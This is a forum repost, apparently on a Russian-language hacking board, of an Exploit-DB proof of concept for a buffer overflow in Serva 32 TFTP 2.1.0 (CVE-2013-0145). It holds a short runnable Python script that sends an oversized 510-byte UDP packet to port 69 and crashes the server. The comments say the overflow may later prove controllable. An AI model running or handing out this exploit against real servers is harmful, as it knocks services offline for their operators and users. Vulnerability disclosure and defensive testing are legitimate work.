Exploit Serva 32 TFTP 2.1.0 - Buffer Overflow (Denial of Service) (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25472
Проверка EDB
  1. Пройдено
Автор
SAPLING
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2013-0145
Дата публикации
2013-05-15
Код:
#Serva 32 TFTP Buffer overflow DoS
#
#05/14/2013
#Sapling
#Vendor homepage http://www.vercot.com/
#Software Link:
#http://www.vercot.com/~serva/download/Serva_Non-Supporter_32_v2.1.0.zip
#Version 2.1.0 Only prior versions are not vulnerable
#Tested on Windows 8, Windows 7, Windows XP SP1-3
#CVE to be established today or tomorrow.
#
#This is the serva 32 Proof Of Concept exploit discovered and written by Sapling. At this
#time the exploit is only a denial of service but evidence show it may be controllable.
#The difficulty with controlling it at this point was the failure to overwrite the SEH
#chains or bypass them. The crash occurs when sending a message longer than 509 bytes long

#start of python file
import sys
import socket

new = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
new.connect(('192.168.1.19', 69))
new.send('\x41'*510)
#end of python file
 
Источник
www.exploit-db.com

Похожие темы